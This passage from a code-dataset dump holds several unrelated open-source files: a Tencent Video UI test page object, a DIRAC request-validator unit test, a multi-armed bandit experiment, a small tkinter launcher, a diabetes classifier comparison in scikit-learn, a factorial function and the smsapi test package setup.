first dummy page needed by the framework to start.\nURL: None\nPlease do not modify or delete this page\n\"\"\"\nimport os, sys, time\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom .Mobile_Base_Page import Mobile_Base_Page\nfrom utils.Wrapit import Wrapit\nimport conf.locators_mobile_acclerate_conf as locators\nimport conf.mobile_app_conf as app_conf\nclass TecentVideo_Mobile_Page(Mobile_Base_Page):\n    app_conf = app_conf.app_tecentVIdeo\n    tecentVideo_search = locators.tecentVideo_search\n    tecentVideo_search_text_clear = locators.tecentVideo_search_text_clear\n    tecentVideo_search_text = locators.tecentVideo_search_text\n    tecentVideo_search_button = locators.tecentVideo_search_button\n    tecentVideo_QYN_1 = locators.tecentVideo_QYN_1\n    tecentVideo_error = locators.tecentVideo_error\n\n    def start(self):\n        \"Use this method to go to specific URL -- if needed\"\n        print(\"start\")\n        pass\n\n    @Wrapit._screenshot\n    def click_search_begin(self):\n        try:\n            # Click the search box to begin a search.\n            result_flag = None\n            if self.click_element(self.tecentVideo_search):\n                result_flag = True\n            else:\n                result_flag = False \n\n            self.conditional_write(result_flag,\n                positive='click_search_begin',\n                negative='Failed to click_search_begin',\n                level='debug')\n\n        except Exception as e:\n            self.write(\"Failed to click the Tencent Video search box\") \n            self.write(str(e))\n        return result_flag\n    \n    @Wrapit._screenshot\n    def input_search_text(self,text):\n        # try :\n        #     self.click_element(self.tecentVideo_search_button)\n        # except Exception as e:\n        #     self.write(\"Tencent Video: failed to click search while skipping the search box\")\n        #     self.wait(2)\n        # # self.click_element(self.tecentVideo_search_text)\n        # try:\n        #     self.touch_tap(600,100)\n        # except Exception as e:\n        #     self.write(\"Failed to tap the X button\")\n        #     self.wait(1)\n        try:\n            # Type the search text into the search box.\n            result_flag = None\n\n            if self.set_text(self.tecentVideo_search_text,text):\n                result_flag = True\n            else:\n                result_flag = False \n\n            self.conditional_write(result_flag,\n                positive='tecentVideo input search text',\n                negative='tecentVideo Failed to input search text',\n                level='debug')\n\n        except Exception as e:\n            self.write(\"Failed to enter the search text\") \n            self.write(str(e))\n        return result_flag\n    @Wrapit._screenshot\n    def click_search_button(self):\n        try:\n            # Click the search button to run the search.\n            result_flag = None\n            if self.click_element(self.tecentVideo_search_button):\n                result_flag = True\n            else:\n                result_flag = False \n\n            self.conditional_write(result_flag,\n                positive='Tencent Video: clicked the search button to confirm the search',\n                negative='Tencent Video: failed to click the search button',\n                level='debug')\n\n        except Exception as e:\n            self.write(\"Tencent Video: failed to click the search button\") \n            self.write(str(e))\n        return result_flag\n    @Wrapit._screenshot\n    def select_QYN_series(self):\n        try:\n            # Click the first episode in the search results.\n            result_flag = None\n            if self.click_element(self.tecentVideo_QYN_1):\n                result_flag = True\n            else:\n                result_flag = False \n\n            self.conditional_write(result_flag,\n                positive='Selected the first episode in the search results',\n                negative='Failed to select the episode',\n                level='debug')\n\n        except Exception as e:\n            self.write(\"Exception while selecting the episode from the search results.\") \n            self.write(str(e))\n        return result_flag\n    @Wrapit._screenshot\n    def play_video(self,time):\n        self.wait(time)\n        self.write(\"Tencent Video is playing; waiting for the given time\") ","repo_name":"justtwo2/TestGen","sub_path":"qxf2-page-object-model-master/page_objects/tecentVideo_mobile_page.py","file_name":"tecentVideo_mobile_page.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"5140294987","text":"\"\"\" :mod: 
RequestValidatorTests\n =======================\n\n .. module: RequestValidatorTests\n :synopsis: test cases for RequestValidator\n .. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com\n\n test cases for RequestValidator\n\"\"\"\nimport unittest\nfrom unittest.mock import MagicMock as Mock, patch\n\nfrom DIRAC.RequestManagementSystem.Client.Request import Request\nfrom DIRAC.RequestManagementSystem.Client.Operation import Operation\nfrom DIRAC.RequestManagementSystem.Client.File import File\n\n# SUT\nfrom DIRAC.RequestManagementSystem.private.RequestValidator import RequestValidator\n\n\n########################################################################\nclass RequestValidatorTests(unittest.TestCase):\n \"\"\"\n .. class:: RequestValidatorTests\n\n \"\"\"\n\n def setUp(self):\n \"\"\"test setup\"\"\"\n self.request = Request()\n self.operation = Operation()\n self.file = File()\n\n def tearDown(self):\n \"\"\"test tear down\"\"\"\n del self.request\n del self.operation\n del self.file\n\n @patch(\"DIRAC.ConfigurationSystem.Client.PathFinder.getSystemInstance\", new=Mock())\n def testValidator(self):\n \"\"\"validator test\"\"\"\n\n # create validator\n validator = RequestValidator()\n self.assertEqual(isinstance(validator, RequestValidator), True)\n\n # RequestName not set\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.RequestName = \"test_request\"\n\n # # no operations\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.addOperation(self.operation)\n\n # # type not set\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.operation.Type = \"ReplicateAndRegister\"\n\n # # files not present\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.operation.addFile(self.file)\n\n # # targetSE not set\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.operation.TargetSE = \"CERN-USER\"\n\n # # missing LFN\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.file.LFN = \"/a/b/c\"\n\n # # no ownerDN\n # force no owner DN because it takes the one of the current user\n self.request.OwnerDN = \"\"\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.OwnerDN = \"foo/bar=baz\"\n\n # # no owner group\n # same, force it\n self.request.OwnerGroup = \"\"\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n self.request.OwnerGroup = \"dirac_user\"\n\n # Checksum set, ChecksumType not set\n self.file.Checksum = \"abcdef\"\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n\n # ChecksumType set, Checksum not set\n self.file.Checksum = \"\"\n self.file.ChecksumType = \"adler32\"\n\n ret = validator.validate(self.request)\n self.assertFalse(ret[\"OK\"])\n\n # both set\n self.file.Checksum = \"abcdef\"\n self.file.ChecksumType = \"adler32\"\n ret = validator.validate(self.request)\n self.assertEqual(ret, {\"OK\": True, \"Value\": None})\n\n # both unset\n self.file.Checksum = \"\"\n self.file.ChecksumType = None\n ret = validator.validate(self.request)\n self.assertEqual(ret, {\"OK\": True, \"Value\": None})\n\n # all OK\n ret = validator.validate(self.request)\n self.assertEqual(ret, {\"OK\": True, \"Value\": None})\n\n\n# test suite execution\nif __name__ == \"__main__\":\n gTestLoader = unittest.TestLoader()\n gSuite = gTestLoader.loadTestsFromTestCase(RequestValidatorTests)\n gSuite = unittest.TestSuite([gSuite])\n 
unittest.TextTestRunner(verbosity=3).run(gSuite)\n","repo_name":"hmiyake/DIRAC","sub_path":"src/DIRAC/RequestManagementSystem/private/test/Test_RequestValidator.py","file_name":"Test_RequestValidator.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"35006068498","text":"import random as r\nimport math as m\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Global variables\n\nNB_LEVIERS = 5\nRECOMPENSE_MAX = 5\nNB_ITER = 1000\nEPSILON = 0.5\n\ndef jouer(machines,action):\n    proba = machines[action]\n    if r.random() < proba :\n        return 1\n    else :\n        return 0\n\ndef alea(recomp,memo):\n    indice = r.randint(0,len(recomp)-1)\n    return indice\n\ndef greedy(recomp,memo):\n    tab = [0]*len(recomp)\n    for i in range(10 * len(recomp)):\n        levier = alea(recomp,memo)\n        tab[levier] += recomp[levier]\n\n    imaxi , maxi = (0,0)\n    for i in range(len(tab)):\n        if tab[i] > maxi :\n            maxi = tab[i]\n            imaxi = i\n    return imaxi\n\ndef epsgreedy(recomp,memo):\n    epsilon = EPSILON\n    tab = [0]*len(recomp)\n    for i in range(10 * len(recomp)):\n        if (r.random() < epsilon):\n            levier = alea(recomp, memo)\n            tab[levier] += recomp[levier]\n        else :\n            levier = greedy(recomp, memo)\n            tab[levier] += recomp[levier]\n\n    imaxi,maxi = (0,0)\n    for i in range(len(tab)):\n        if tab[i] > maxi :\n            maxi = tab[i]\n            imaxi = i\n    return imaxi\n\n\ndef UCB(recomp,memo):\n    nb_parties = np.sum(memo) # Number of rounds played\n    tab = [nb_parties]*len(recomp)\n    for i in range(1, 10 * len(recomp)):\n        levier = alea(recomp,memo)\n        if(memo[levier] != 0):\n            tab[levier] = recomp[levier] + m.sqrt( 2*m.log(i) / float(memo[levier]) )\n\n    imaxi,maxi = (0,0)\n    for i in range(len(tab)):\n        if tab[i] > maxi :\n            maxi = tab[i]\n            imaxi = i\n    return imaxi\n\n\nLeviers = [r.random() for i in range(NB_LEVIERS)] # Array of probabilities\nprint(Leviers)\n\n\n\"\"\" \naction = r.randint(0,len(Leviers)-1) \nprint(jouer(Leviers,action)) \n\"\"\"\n\n\nMemos = [0]*len(Leviers) # Memory array (play counts)\nRecomp = [0]*len(Leviers) # Reward array\n\nfor i in range(len(Leviers)):\n    for k in range(10):\n        Recomp[i] += jouer(Leviers,i)\n        Memos[i] += 1\n    Recomp[i] /= 10.0\n\nprint(Recomp)\n\n\"\"\"for i in range(0,100):\n    # ind = alea(Recomp,Memos)\n    ind = UCB(Recomp,Memos)\n    win = jouer(Leviers,ind)\n    Memos[ind] += 1\n    Recomp[ind] = ( ( Recomp[ind] * (Memos[ind]-1)) + win ) / float(Memos[ind])\n\nprint(Recomp)\nprint(Memos)\n\"\"\"\n\n\n# HERE WE COMPARE OUR DIFFERENT ALGORITHMS AND THEIR REGRETS\n\"\"\"\nmeilleur_machine = np.argmax(Leviers) ## WE PICK THE BEST ACTION\nsum_max = [0.0]*NB_ITER\n\nsum_alea = [0.0]*NB_ITER\n\nsum_greedy = [0.0]*NB_ITER\nsum_epsgreedy = [0.0]*NB_ITER\nsum_UCB = [0.0]*NB_ITER\n\nregrets_alea = [0.0]*NB_ITER\nregrets_greedy = [0.0]*NB_ITER\nregrets_epsgreedy = [0.0]*NB_ITER\nregrets_UCB = [0.0]*NB_ITER\n\nfor i in range(1,NB_ITER):\n    sum_max[i] = sum_max[i-1] + jouer(Leviers,meilleur_machine)\n    sum_alea[i] = sum_alea[i-1] + jouer(Leviers, alea(Recomp,Memos))\n    sum_greedy[i] = sum_greedy[i-1] + jouer(Leviers,greedy(Recomp,Memos))\n    sum_epsgreedy[i] = sum_epsgreedy[i-1] + jouer(Leviers,epsgreedy(Recomp,Memos))\n    sum_UCB[i] = sum_UCB[i-1] + jouer(Leviers,UCB(Recomp,Memos))\n\n\n    regrets_alea[i] = sum_max[i] - sum_alea[i]\n    regrets_greedy[i] = sum_max[i] - sum_greedy[i]\n    regrets_epsgreedy[i] = sum_max[i] - sum_epsgreedy[i]\n    regrets_UCB[i] = sum_max[i] - sum_UCB[i]\n\n\n\nWe create an AI that always picks the machine with the best probability and sum up those gains \n\nThen we run our program, compute the sum, and plot the difference between these two terms \n\n\n\nplt.plot(range(NB_ITER),regrets_alea, label = \"Alea\")\nplt.plot(range(NB_ITER),regrets_greedy, label = \"greedy\")\nplt.plot(range(NB_ITER),regrets_epsgreedy, label = \"eps-greedy\")\nplt.plot(range(NB_ITER),regrets_UCB, label = \"UCB\")\n\n\nplt.title(\"Comparison of the different approaches and their respective regrets\")\nplt.legend()\n\nplt.show()\n\n\"\"\"\n\n# HERE WE STUDY THE BEHAVIOR OF EPS-GREEDY FOR DIFFERENT EPS VALUES\n\"\"\"\nEPSI = [k for k in [0.0,0.3,0.5,0.75,1.0]]\n#print(\"blabla\",EPSI)\n\nmeilleur_machine = np.argmax(Leviers) ## WE PICK THE BEST ACTION\nsum_max = [0.0]*NB_ITER\n\nsum_greedy = [0.0]*NB_ITER\nregret_greedy = [0.0]*NB_ITER\n\nsum_epsgreedy1 = [0.0]*NB_ITER\nsum_epsgreedy2 = [0.0]*NB_ITER\nsum_epsgreedy3 = [0.0]*NB_ITER\nsum_epsgreedy4 = [0.0]*NB_ITER\nsum_epsgreedy5 = [0.0]*NB_ITER\n\n\nregret_epsgreedy1 = [0.0]*NB_ITER\nregret_epsgreedy2 = [0.0]*NB_ITER\nregret_epsgreedy3 = [0.0]*NB_ITER\nregret_epsgreedy4 = [0.0]*NB_ITER\nregret_epsgreedy5 = [0.0]*NB_ITER\n\n\nfor i in range(1,NB_ITER):\n    sum_max[i] = sum_max[i - 1] + jouer(Leviers, meilleur_machine)\n    sum_greedy[i] = sum_greedy[i - 1] + jouer(Leviers, greedy(Recomp, Memos))\n    regret_greedy[i] = sum_max[i] - sum_greedy[i]\n\nEPSILON = EPSI[0]\n\nfor j in range(1,NB_ITER):\n    sum_epsgreedy1[j] = sum_epsgreedy1[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n    regret_epsgreedy1[j] = sum_max[j] - sum_epsgreedy1[j]\n\nEPSILON = EPSI[1]\n\nfor j in range(1,NB_ITER):\n    sum_epsgreedy2[j] = sum_epsgreedy2[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n    regret_epsgreedy2[j] = sum_max[j] - sum_epsgreedy2[j]\n\n\nEPSILON = EPSI[2]\n\nfor j in range(1,NB_ITER):\n    sum_epsgreedy3[j] = sum_epsgreedy3[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n    regret_epsgreedy3[j] = sum_max[j] - sum_epsgreedy3[j]\n\nEPSILON = EPSI[3]\n\nfor j in range(1,NB_ITER):\n    sum_epsgreedy4[j] = sum_epsgreedy4[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n    regret_epsgreedy4[j] = sum_max[j] - sum_epsgreedy4[j]\n\nEPSILON = EPSI[4]\n\nfor j in range(1,NB_ITER):\n    sum_epsgreedy5[j] = sum_epsgreedy5[j - 1] + jouer(Leviers, epsgreedy(Recomp, Memos))\n    regret_epsgreedy5[j] = sum_max[j] - sum_epsgreedy5[j]\n\nplt.plot(range(NB_ITER),regret_greedy,label=\"greedy\")\nplt.plot(range(NB_ITER),regret_epsgreedy1,label=\"eps = 0 \")\nplt.plot(range(NB_ITER),regret_epsgreedy2,label=\"eps = 0.3\")\nplt.plot(range(NB_ITER),regret_epsgreedy3,label=\"eps = 0.5\")\nplt.plot(range(NB_ITER),regret_epsgreedy4,label=\"eps = 0.75\")\nplt.plot(range(NB_ITER),regret_epsgreedy5,label=\"eps = 1\")\n\nplt.legend()\n\nplt.show()\n\n\"\"\"\n\n# TEST 6: VARY THE NUMBER OF LEVERS\n\n","repo_name":"AlamHenri/Exploration-Exploitation","sub_path":"banchots.py","file_name":"banchots.py","file_ext":"py","file_size_in_byte":6286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"4637036335","text":"import subprocess\r\nimport tkinter as tk\r\nimport customtkinter\r\n\r\n# Create the main window\r\nroot = customtkinter.CTk()\r\nroot.title(\"Open Program\")\r\nroot.configure(bg=\"#2a2d30\")\r\nroot.resizable(False, False)\r\ncustomtkinter.set_appearance_mode(\"Dark\")\r\n\r\n\r\ndef open_program():\r\n    program_path = \"C:/Users/roelb/PycharmProjects/pythonProject2/courses.py\"\r\n    try:\r\n        subprocess.Popen([\"python\", program_path])\r\n    except FileNotFoundError:\r\n        print(\"Program file not 
found.\")\r\n\r\n\r\n# Create a button to open the program\r\nbutton = customtkinter.CTkButton(root, text=\"Open Program\", command=open_program)\r\nbutton.pack(padx=10, pady=10)\r\n\r\nroot.mainloop()\r\n","repo_name":"ynbyl/comsci","sub_path":"CCC151/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19606434417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 18:46:56 2022\n\n@author: Sergio Gomez\n\"\"\"\nimport math, time, random, datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom warnings import simplefilter\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import linear_model\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\n\n\nurl = 'diabetes.csv'\ndata = pd.read_csv(url)\n\n#Tratamiento de la data\n #Sabemos que hay 768 personas con una distribucion desigual\n #Tambien hay algunos valores de (0) en las tablas de 'Glucose', 'BloodPressure', 'SkinThickness', 'Insulin' y 'BMI'.\n #Los datos que estan definidos como '0' serán reemplazados por el valor promedio del grupo de datos.\n \n\n#Los datos '0' de las tablas mencionadas anteriormente han pasado a ser el valor del promedio de cada respectivo dato\n \n #El promedio de la tabla Glucose es 121, entonces los valores de 0 seran reemplazdos por 121\ndata.Glucose.replace(0, 121, inplace=True)\n \n #El promedio de la tabla BloodPressure es 69, entonces los valores de 0 seran reemplazdos por 69\ndata.BloodPressure.replace(0, 69, inplace=True)\n\n #El promedio de la tabla SkinThickness es 21, entonces los valores de 0 seran reemplazdos por 21\ndata.SkinThickness.replace(0, 21, inplace=True) \n\n #El promedio de la tabla Insulin es 80, entonces los valores de 0 seran reemplazdos por 80\ndata.Insulin.replace(0, 80, inplace=True) \n \n #El promedio de la tabla BMI es 32, entonces los valores de 0 seran reemplazdos por 32\ndata.BMI.replace(0, 32, inplace=True) \n\n \n#Partir la data en dos\n\ndata_train = data[:385]\ndata_test = data[385:]\n\nx = np.array(data_train.drop(['Outcome'], 1))\ny = np.array(data_train.Outcome) #0 no tiene diabetes, 1 si tiene diabetes\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25)\n\nx_test_out = np.array(data_test.drop(['Outcome'], 1))\ny_test_out = np.array(data_test.Outcome)\n#Regresión logística\n\n#Seleccionar un modelo\n\n\n\nkfold = KFold(n_splits=10) #Kfold se cambia a 10 splits\n\nacc_scores_train_train = []\nacc_scores_test_train = []\nlogreg = LogisticRegression(solver='lbfgs', max_iter = 7600)\n\nfor train, test in kfold.split(x, y):\n logreg.fit(x[train], y[train])\n scores_train_train = logreg.score(x[train], y[train])\n scores_test_train = logreg.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = logreg.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\n\nprint('Regresión Logística Validación cruzada')\n\n# Accuracy de 
Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {logreg.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión Regresion Loigistica: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución Regresion Loigistica\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_1 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_1}')\n\n\nprint('*'*50)\n\n\n\nsvc = SVC(kernel='rbf') #Se utiliza el núcleo rbf/gaussiano para adaptarse al modelo.\n\nfor train, test in kfold.split(x, y):\n svc.fit(x[train], y[train])\n scores_train_train = svc.score(x[train], y[train])\n scores_test_train = svc.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = svc.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\n\nprint('Maquina de soporte vectorial Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {svc.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión SVC: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución svc\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_2 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_2}')\n\n\nprint('*'*50)\n\n\n\n\narbol = DecisionTreeClassifier(max_depth=2, random_state=42)# Se usa un árbol de profundidad 2 para que no haya overfitting\n\nfor train, test in kfold.split(x, y):\n arbol.fit(x[train], y[train])\n scores_train_train = arbol.score(x[train], y[train])\n scores_test_train = arbol.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = arbol.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\nprint('Arbol de Desicion Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {arbol.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión arbol de decision: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = 
confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución arbol de decision\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_3 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_3}')\n\n\nprint('*'*50)\n\n#Random Forest Classifier\n\n\n\nclf = RandomForestClassifier(max_depth=2, random_state=0)\n\nfor train, test in kfold.split(x, y):\n clf.fit(x[train], y[train])\n scores_train_train = clf.score(x[train], y[train])\n scores_test_train = clf.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = clf.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\n\nprint('Arbol de Desicion Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {clf.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión Random Forest: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confusión Random Forest\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_4 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_4}')\n\n\nprint('*'*50)\n\n\n\n#Vecino mas cercano\n\nkn = KNeighborsClassifier()\n\nfor train, test in kfold.split(x, y):\n kn.fit(x[train], y[train])\n scores_train_train = kn.score(x[train], y[train])\n scores_test_train = kn.score(x[test], y[test])\n acc_scores_train_train.append(scores_train_train)\n acc_scores_test_train.append(scores_test_train)\n \ny_pred = kn.predict(x_test_out)\nprint(f'y de prediccion: {y_pred}')\nprint(f'Y real :{y_test_out}')\nprint('Vecino mas cercano Validación cruzada')\n\n# Accuracy de Entrenamiento de Entrenamiento\nprint(f'accuracy de Entrenamiento de Entrenamiento: {np.array(acc_scores_train_train).mean()}')\n\n# Accuracy de Test de Entrenamiento\nprint(f'accuracy de Test de Entrenamiento: {np.array(acc_scores_test_train).mean()}')\n\n# Accuracy de Validación\nprint(f'accuracy de Validación: {kn.score(x_test_out, y_test_out)}')\n\n\n# Matriz de confusión\nprint(f'Matriz de confusión Vecino mas cercano: {confusion_matrix(y_test_out, y_pred)}')\n\nmatriz_confusion = confusion_matrix(y_test_out, y_pred)\nplt.figure(figsize = (6, 6))\nsns.heatmap(matriz_confusion)\nplt.title(\"Mariz de confución Vecino mas cercano\")\n\nprecision = precision_score(y_test_out, y_pred, average=None).mean()\nprint(f'Precisión: {precision}')\n\nrecall = recall_score(y_test_out, y_pred, average=None).mean()\nprint(f'Re-call: {recall}')\n\nf1_score_5 = f1_score(y_test_out, y_pred, average=None).mean()\n\nprint(f'f1: {f1_score_5}')\n\n 
\n","repo_name":"checho2820/TallerAI","sub_path":"Diabetes/Diabetes.py","file_name":"Diabetes.py","file_ext":"py","file_size_in_byte":9861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35676631606","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 24 11:52:05 2018\r\n\r\n@author: atul\r\n\"\"\"\r\n\r\ndef fact(n):\r\n if n ==0 or n==1:\r\n return 1\r\n else:\r\n return n*fact(n-1)\r\n \r\nfor i in range(11):\r\n print(fact(i))","repo_name":"atulanandnitt/questionsBank","sub_path":"recursion/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8386221242","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport unittest\nimport pkgutil\nimport requests\n\nfrom smsapi.api import Api\nfrom smsapi.client import SmsApiPlClient\nfrom smsapi.models import ResultCollection\nfrom smsapi.sms import response_format_param\nfrom smsapi.sms.model import SmsSendResult\n\nfrom tests.unit.doubles import ApiSpy, request_fake\nfrom tests.unit.fixtures import create_send_result\n\nrequests.request = request_fake\n\n\nclass SmsApiTestCase(unittest.TestCase):\n\n def setUp(self):\n self.request_fake = request_fake\n\n self.client = SmsApiPlClient(access_token='some-access-token')\n\n spy_endpoints(self.client)\n\n def load_fixture(self, dir, fixture):\n with open(os.path.abspath(os.path.dirname(__file__)) + '/%s/fixtures/%s.json' % (dir, fixture)) as f:\n data = f .read()\n\n return json.loads(data)\n\n def assertParamsForwardedToRequestEquals(self, params, *args):\n for d in args:\n params.update(d or {})\n\n params.update(response_format_param)\n\n self.assertEqual(params, self.request_fake.payload)\n\n def assertRequestPayloadContains(self, key, value):\n self.assertIn(key, self.request_fake.payload.keys())\n self.assertIn(value, self.request_fake.payload.values())\n\n def assertSendResultForNumberEquals(self, number, result, result_class=ResultCollection):\n numbers = number if isinstance(number, list) else [number]\n\n expected_result = result_class(len(numbers), [create_send_result(n) for n in numbers])\n\n self.assertEqual(expected_result, result)\n\n def assertSmsSendResultForNumberEquals(self, number, result):\n self.assertSendResultForNumberEquals(number, result, result_class=SmsSendResult)\n\n\ndef spy_endpoints(client):\n\n for attr in client.__dict__:\n if isinstance(client.__dict__[attr], Api):\n client.__dict__[attr] = ApiSpy(client.__dict__[attr])\n\n\ndef import_from_string(name):\n\n if '.' 
in name:\n        module, pkg = name.rsplit(\".\", 1)\n    else:\n        return __import__(name)\n\n    return getattr(__import__(module, None, None, [pkg]), pkg)\n\n\ndef app_test_suites(module_name):\n\n    module = import_from_string(module_name)\n\n    path = getattr(module, '__path__', None)\n\n    if not path:\n        raise ValueError('%s is not a package' % module)\n\n    basename = module.__name__ + '.'\n\n    for importer, module_name, is_pkg in pkgutil.iter_modules(path):\n        module_name = basename + module_name\n\n        if is_pkg:\n            for suite in app_test_suites(module_name):\n                yield suite\n\n        module = import_from_string(module_name)\n\n        if hasattr(module, 'suite'):\n            yield module.suite()\n\n\ndef suite():\n    suite = unittest.TestSuite()\n    for _suite in app_test_suites(__name__):\n        suite.addTest(_suite)\n    return suite\n\n\ndef run_tests():\n    try:\n        unittest.TextTestRunner(verbosity=2).run(suite())\n    except Exception as e:\n        print('Error: %s' % e)\n\n\nif __name__ == '__main__':\n    run_tests()","repo_name":"smsapi/smsapi-python-client","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"37"}
